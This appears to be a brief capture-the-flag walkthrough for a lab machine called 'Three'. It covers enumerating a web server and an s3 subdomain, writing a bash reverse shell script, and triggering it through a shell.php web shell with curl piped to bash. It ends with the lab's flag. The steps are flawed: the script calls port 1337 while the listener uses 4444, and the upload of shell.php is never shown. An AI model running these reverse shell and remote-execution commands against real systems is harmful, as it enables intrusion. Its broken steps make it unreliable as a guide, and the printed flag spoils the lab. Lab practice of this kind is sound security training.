top of page

Three


As usual, let's start with map

nmap -sV targetIP


There is a website on port 80, open your browser and type the target IP (in this case 10.129.199.172)


Scroll down and we find this domain name thetoppers.htb


Let's use the word list subdomains-top1million-5000.txt already located on your Parrot VM to enumerate any subdomains


gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb 

We found a subdomain called s3.thetoppers.htb

Open your browser and go to s3.thetoppers.htb



Find out what your IP is using

ifconfig

Check out the IP in tun0



Create a new bash file called shell.sh

#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1 

Open a new terminal window and start listening with net cat on one window

nc -lnvp 4444

Create a web server using the command below (make sure you are in the same directory as where shell.sh is located)

python3 -m http.server 8000 


Go back to the browser and type in the url bar

http://thetoppers.htb/shell.php?cmd=curl%20<YOUR_IP_ADDRESS>:8000/shell.sh|bash


The flag is located at var/www/flag.txt

a980d99281a28d638ac68b9bf9453c2b


34 views0 comments

Recent Posts

See All

Sequel

Crocodile

bottom of page